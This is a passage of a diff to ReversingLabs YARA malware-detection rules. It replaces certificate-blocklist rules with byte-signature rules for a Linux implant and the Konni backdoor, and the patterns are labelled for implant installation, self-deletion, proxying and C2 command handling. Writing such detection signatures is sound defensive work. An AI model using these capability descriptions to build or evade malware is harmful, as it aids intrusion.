+            F3 0F 1E FA 55 48 89 E5 41 54 53 48 81 EC ?? ?? ?? ?? 64 48 8B 04 25 ?? ?? ?? ?? 48
+            89 45 ?? 31 C0 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? 48
+            8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ??
+            ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 35
+            ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C2 48
+            8D 45 ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8
+            ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 45 ??
+            48 89 C7 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C2 48 8D 45 ?? 48 89 D6 48 89 C7 E8 ??
+            ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 35 ?? ?? ?? ?? 48 89
+            C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C2 48 8D 45 ?? 48 89 D6
+            48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8
+            ?? ?? ?? ?? 48 8D 45 ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48
+            89 C7 E8 ?? ?? ?? ?? 48 89 C2 48 8D 45 ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45
+            ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 89
+            85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 89 85 ??
+            ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C3 48 8D 45 ?? 48 89 C7 E8 ?? ??
+            ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 DE 48 89 C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ??
+            ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7
+        }
+		$install_library_implant_p2 = {
+            E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ??
+            ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 9D ?? ?? ?? ?? EB ?? 8B 45 ??
+            4C 63 E0 48 8B 5D ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 4C 89 E2 48
+            89 DE 48 89 C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 9D ??
+            ?? ?? ?? EB ?? BB ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89
+            C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ??
+            ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 89 D8 48 8B 4D ?? 64 48 33 0C 25 ?? ?? ??
+            ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? F3 0F 1E FA 48 89 C3 48 8D 45 ?? 48 89 C7 E8 ??
+            ?? ?? ?? EB ?? F3 0F 1E FA 48 89 C3 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? F3 0F
+            1E FA 48 89 C3 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? F3 0F 1E FA 48 89 C3 48 8D
+            45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? F3 0F 1E FA 48 89 C3 48 8D 45 ?? 48 89 C7 E8 ??
+            ?? ?? ?? EB ?? F3 0F 1E FA 48 89 C3 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? F3 0F
+            1E FA 48 89 C3 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? F3 0F 1E FA 48 89 C3 48 8D
+            45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 D8 48 89 C7 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 81
+            C4 ?? ?? ?? ?? 5B 41 5C 5D C3
+        }
+		$self_delete = {
+            F3 0F 1E FA 55 48 89 E5 53 48 83 EC ?? 64 48 8B 04 25 ?? ?? ?? ?? 48 89 45 ?? 31 C0
+            48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 89 45 ?? 83
+            7D ?? ?? 74 ?? 8B 5D ?? EB ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C7 E8 ?? ??
+            ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B 5D ?? EB ?? BB ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7
+            E8 ?? ?? ?? ?? 89 D8 48 8B 55 ?? 64 48 33 14 25 ?? ?? ?? ?? 74 ?? EB ?? F3 0F 1E FA
+            48 89 C3 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 D8 48 89 C7 E8 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 83 C4 ?? 5B 5D C3
+        }
+		$execute_local_file_p1 = {
+            F3 0F 1E FA 55 48 89 E5 41 55 41 54 53 48 81 EC ?? ?? ?? ?? 48 83 0C 24 ?? 48 81 EC
+            ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 48 89 8D ?? ??
+            ?? ?? 64 48 8B 04 25 ?? ?? ?? ?? 48 89 45 ?? 31 C0 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8
+            ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ??
+            48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 48 8D 9D ?? ?? ?? ?? 41 BC ?? ??
+            ?? ?? 49 89 DD 4D 85 E4 78 ?? 4C 89 EF E8 ?? ?? ?? ?? 49 83 C5 ?? 49 83 EC ?? EB ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? 0F B6 C0 39 85 ?? ?? ?? ?? 7D ??
+            48 8D 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 48 63 D2 48 C1 E2 ?? 48 01 C2 48 8B 85 ?? ??
+            ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? EB ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C2
+            48 8D 85 ?? ?? ?? ?? 48 89 C6 48 89 D7 E8 ?? ?? ?? ?? C1 E8 ?? 84 C0 74 ?? E8 ?? ??
+            ?? ?? 8B 00 89 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 83 F8 ?? 74
+            ?? 8B 85 ?? ?? ?? ?? 83 C8 ?? 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 89
+            DE 48 89 C7 E8 ?? ?? ?? ?? C1 E8 ?? 84 C0 74 ?? E8 ?? ?? ?? ?? 8B 00 89 85 ?? ?? ??
+            ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 88 ?? ??
+            ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 89
+        }
+		$execute_local_file_p2 = {
+            C7 E8 ?? ?? ?? ?? 39 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89
+            85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 88 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? BF
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 85 ?? ?? ?? ?? 7D ?? 8B 85 ?? ?? ?? ?? 89
+            C7 E8 ?? ?? ?? ?? 85 C0 83 85 ?? ?? ?? ?? ?? EB ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E8 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 78 ??
+            48 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 98 48 01 D0 0F B6 00 3C ?? 75 ?? 48 8B 85
+            ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 48 63 D2 48 83 C2 ?? 48 01 C2 48 8D 85 ?? ?? ?? ?? 48
+            89 D6 48 89 C7 E8 ?? ?? ?? ?? EB ?? 83 85 ?? ?? ?? ?? ?? EB ?? 48 8B 85 ?? ?? ?? ??
+            48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ??
+            48 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? 0F B6 C0 39
+            85 ?? ?? ?? ?? 7D ?? 8B 85 ?? ?? ?? ?? 8D 48 ?? 8B 85 ?? ?? ?? ?? 48 98 48 C1 E0 ??
+            48 8D 75 ?? 48 01 F0 48 2D ?? ?? ?? ?? 48 8B 10 48 63 C1 48 89 94 C5 ?? ?? ?? ?? 83
+        }
+		$execute_local_file_p3 = {
+            85 ?? ?? ?? ?? ?? EB ?? 0F B6 85 ?? ?? ?? ?? 0F B6 C0 83 C0 ?? 48 98 48 C7 84 C5 ??
+            ?? ?? ?? ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C2 48 8D 85
+            ?? ?? ?? ?? 48 89 C6 48 89 D7 E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 85
+            ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 8B 85
+            ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 41 89 C4 90 48
+            8D 9D ?? ?? ?? ?? 48 81 C3 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 39 C3 74 ?? 48 83 EB
+            ?? 48 89 DF E8 ?? ?? ?? ?? EB ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 44 89
+            E0 48 8B 4D ?? 64 48 33 0C 25 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? F3 0F 1E
+            FA 49 89 C5 48 85 DB 74 ?? B8 ?? ?? ?? ?? 4C 29 E0 48 C1 E0 ?? 4C 8D 24 03 49 39 DC
+            74 ?? 49 83 EC ?? 4C 89 E7 E8 ?? ?? ?? ?? EB ?? 4C 89 EB EB ?? F3 0F 1E FA 48 89 C3
+            48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 49 89 DC EB ?? F3 0F 1E FA 49 89 C4 48
+            8D 9D ?? ?? ?? ?? 48 81 C3 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 39 C3 74 ?? 48 83 EB
+            ?? 48 89 DF E8 ?? ?? ?? ?? EB ?? 4C 89 E3 EB ?? F3 0F 1E FA 48 89 C3 48 8D 85 ?? ??
+            ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 D8 48 89 C7 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 81
+            C4 ?? ?? ?? ?? 5B 41 5C 41 5D 5D C3
+        }
+		$network_proxy_communication_p1 = {
+            F3 0F 1E FA 55 48 89 E5 48 81 EC ?? ?? ?? ?? 48 83 0C 24 ?? 48 81 EC ?? ?? ?? ?? 48
+            89 BD ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? 64 48 8B 04 25 ?? ?? ?? ?? 48 89 45 ?? 31 C0
+            B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 89 D7 FC F3 48 AB 89 F8 89 CA
+            89 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 00 8D 50 ?? 85 C0 0F 48
+            C2 C1 F8 ?? 89 C6 48 63 C6 48 8B BC C5 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 00 99 C1
+            EA ?? 01 D0 83 E0 ?? 29 D0 BA ?? ?? ?? ?? 89 C1 48 D3 E2 48 89 D0 48 09 C7 48 89 FA
+            48 63 C6 48 89 94 C5 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 00 8D 50 ?? 85 C0 0F 48 C2
+            C1 F8 ?? 89 C6 48 63 C6 48 8B BC C5 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 00 99 C1 EA
+            ?? 01 D0 83 E0 ?? 29 D0 BA ?? ?? ?? ?? 89 C1 48 D3 E2 48 89 D0 48 09 C7 48 89 FA 48
+            63 C6 48 89 94 C5 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 00 39 85 ?? ?? ??
+            ?? 7D ?? 48 8B 85 ?? ?? ?? ?? 8B 00 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 00 39
+            85 ?? ?? ?? ?? 7D ?? 48 8B 85 ?? ?? ?? ?? 8B 00 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            8D 78 ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 89 D0 B9 ?? ?? ?? ?? BA ?? ??
+            ?? ?? 48 89 C6 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
+            ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ??
+            8B 00 8D 50 ?? 85 C0 0F 48 C2 C1 F8 ?? 48 98 48 8B B4 C5 ?? ?? ?? ?? 48 8B 85 ?? ??
+            ?? ?? 8B 00 99 C1 EA ?? 01 D0 83 E0 ?? 29 D0 BA ?? ?? ?? ?? 89 C1 48 D3 E2 48 89 D0
+        }
+		$network_proxy_communication_p2 = {
+            48 21 F0 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D B5 ?? ?? ?? ?? 48 8B
+            85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 D1 BA ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 89
+            85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 95 ??
+            ?? ?? ?? 48 8D B5 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 C7 E8 ?? ??
+            ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? E9 ?? ?? ?? ??
+            48 8B 85 ?? ?? ?? ?? 8B 00 8D 50 ?? 85 C0 0F 48 C2 C1 F8 ?? 48 98 48 8B B4 C5 ?? ??
+            ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 00 99 C1 EA ?? 01 D0 83 E0 ?? 29 D0 BA ?? ?? ?? ?? 89
+            C1 48 D3 E2 48 89 D0 48 21 F0 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D
+            B5 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 D1 BA ?? ?? ?? ?? 48 89
+            C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? EB
+            ?? 8B 95 ?? ?? ?? ?? 48 8D B5 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89
+            C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? EB ?? 90 E9 ?? ?? ?? ?? 48 8B 4D ?? 64 48 33 0C 25 ?? ?? ?? ?? 74 ?? EB ??
+            F3 0F 1E FA 48 89 C7 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C9 C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Henan Maijiamai Technology Co., Ltd." and pe.signatures [ i ] . serial == "4e:ff:a8:b2:16:e2:4b:16:20:29:40:c1:bc:2f:a8:a5" and 1404691199 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( all of ( $install_library_implant_p* ) ) and ( $self_delete ) and ( all of ( $execute_local_file_p* ) ) and ( all of ( $network_proxy_communication_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_57D7153A89Bbf4729Be87F3C927043Aa : INFO FILE
+rule REVERSINGLABS_Win64_Backdoor_Konni : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Konni backdoor."
 		author = "ReversingLabs"
-		id = "9b778a20-8a0c-5c9f-8cc3-9e5054713e13"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "c45c23c6-be15-58cc-ae4d-631bed4a3bb2"
+		date = "2023-12-07"
+		modified = "2023-12-07"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L207-L223"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a8de7951bd25c8a9346ef341d8bf9c9147f9fa6913e952be40fb43d3d7a370c1"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/backdoor/Win64.Backdoor.Konni.yara#L1-L205"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "37c45e3ed23ca9f4de876f666c9f6d9bf7eee5cb1650b02cdd9f58e2ccc4b5cb"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "Konni"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, zhenganjun" and pe.signatures [ i ] . serial == "57:d7:15:3a:89:bb:f4:72:9b:e8:7f:3c:92:70:43:aa" and 1469059200 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_028E1Deccf93D38Ecf396118Dfe908B4 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "6dfb0181-299f-5a28-b647-137d75f747a6"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L225-L241"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b07c797652ef19c7e0b23c3eddbbbf2700160d743d71a0005b950160474638d8"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$network_communication_p1 = {
+            48 8B C4 53 55 57 41 54 41 55 41 56 41 57 48 83 EC ?? 48 8B 3D ?? ?? ?? ?? 45 33 FF
+            48 8B D9 4C 8D A7 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 49 8B CC 44 89 78 ?? 44 89 78
+            ?? 45 8B F7 44 89 78 ?? 41 8B EF E8 ?? ?? ?? ?? 4C 8D 8F ?? ?? ?? ?? 4C 8D 05 ?? ??
+            ?? ?? BA ?? ?? ?? ?? 49 8B CC 48 89 5C 24 ?? 48 89 7C 24 ?? E8 ?? ?? ?? ?? 48 8D 9F
+            ?? ?? ?? ?? 48 8B CB E8 ?? ?? ?? ?? 41 BD ?? ?? ?? ?? 45 33 C9 45 33 C0 33 C9 41 8B
+            D5 44 89 7C 24 ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 89 44 24 ?? 48 85 C0 75 ?? 83 C8 ??
+            48 83 C4 ?? 41 5F 41 5E 41 5D 41 5C 5F 5D 5B C3 4C 89 7C 24 ?? 44 89 7C 24 ?? 41 B8
+            ?? ?? ?? ?? 45 33 C9 48 8B D3 48 8B C8 C7 44 24 ?? ?? ?? ?? ?? 48 89 B4 24 ?? ?? ??
+            ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 4C 89 7C 24 ?? FF 15 ?? ?? ?? ?? 48 8B F0 48 85
+            C0 0F 84 ?? ?? ?? ?? 4C 89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 45
+            33 C9 4D 8B C4 48 8B C8 4C 89 7C 24 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 4C 89 7C 24
+            ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 45 33 C9 45 33 C0 33 D2 48 8B C8 44 89
+            7C 24 ?? FF 15 ?? ?? ?? ?? 45 33 C9 45 33 C0 48 8B CB 85 C0 74 ?? 48 8D 94 24 ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 45 33 C9 48 8B CB 45 33 C0 33 D2 FF 15 ?? ?? ??
+            ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ??
+            41 8B C5 E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 85 C0 75 ?? 48 8B CB EB ?? FF C0 B9 ??
+            ?? ?? ?? 8B D0 89 84 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8B E0 48 85 C0 74 ?? 44 8B
+        }
+		$network_communication_p2 = {
+            84 24 ?? ?? ?? ?? 33 D2 48 8B C8 E8 ?? ?? ?? ?? 45 33 C9 4C 89 7C 24 ?? 48 8D 0D ??
+            ?? ?? ?? 45 8D 41 ?? BA ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 4C 8B E8 48 8B CB 48 83 F8 ?? 75 ?? 45 33 C9 45 33 C0 33 D2 FF 15
+            ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ??
+            ?? ?? ?? 83 C8 ?? E9 ?? ?? ?? ?? 44 8B 84 24 ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 49
+            8B D4 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? BF ?? ?? ?? ?? 0F 1F 00 44 39 BC 24
+            ?? ?? ?? ?? 74 ?? 48 8D 15 ?? ?? ?? ?? 49 8B CC 41 8B EF E8 ?? ?? ?? ?? 48 85 C0 0F
+            45 EF 3B EF 74 ?? 44 8B 84 24 ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 49 8B D4 49 8B CD
+            4C 89 7C 24 ?? FF 15 ?? ?? ?? ?? 44 8B 84 24 ?? ?? ?? ?? 44 03 B4 24 ?? ?? ?? ?? 33
+            D2 49 8B CC E8 ?? ?? ?? ?? 44 8B 84 24 ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 49 8B D4
+            48 8B CB FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 7C 24 ?? 49 8B CD FF 15 ??
+            ?? ?? ?? 49 8B CC FF 15 ?? ?? ?? ?? 45 33 C9 45 33 C0 33 D2 48 8B CB FF 15 ?? ?? ??
+            ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ??
+            83 C8 ?? 45 85 F6 0F 44 E8 8B C5 48 8B B4 24 ?? ?? ?? ?? 48 83 C4 ?? 41 5F 41 5E 41
+            5D 41 5C 5F 5D 5B C3
+        }
+		$handle_c2_commands_p1 = {
+            48 89 5C 24 ?? 48 89 74 24 ?? 57 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4
+            48 89 84 24 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? 48 8D 54 24 ?? 33 FF 48 8B CE 89 7C 24
+            ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 83 C8 ?? E9 ?? ?? ?? ?? 48 8B 15 ?? ??
+            ?? ?? 48 8B 08 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 4B
+            ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 4B ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
+            75 ?? 48 8B 4B ?? 8D 50 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 4C 24 ?? 33 D2 41 B8
+            ?? ?? ?? ?? 66 89 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 4B ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ??
+            48 8B 15 ?? ?? ?? ?? 48 8B 4B ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 53 ?? 48 8D 0D ??
+            ?? ?? ?? 45 33 C0 FF 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E9 ?? ??
+            ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 4B ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 4B ?? E8 ??
+            ?? ?? ?? 69 C0 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48
+            8B 4B ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 4B ?? E8 ?? ?? ?? ?? 69 C0 ?? ?? ?? ?? 89
+        }
+		$handle_c2_commands_p2 = {
+            05 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 63 4C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 8B 4C CB ?? E8
+            ?? ?? ?? ?? 48 8B CE 85 C0 75 ?? 8D 50 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 D2 E8 ??
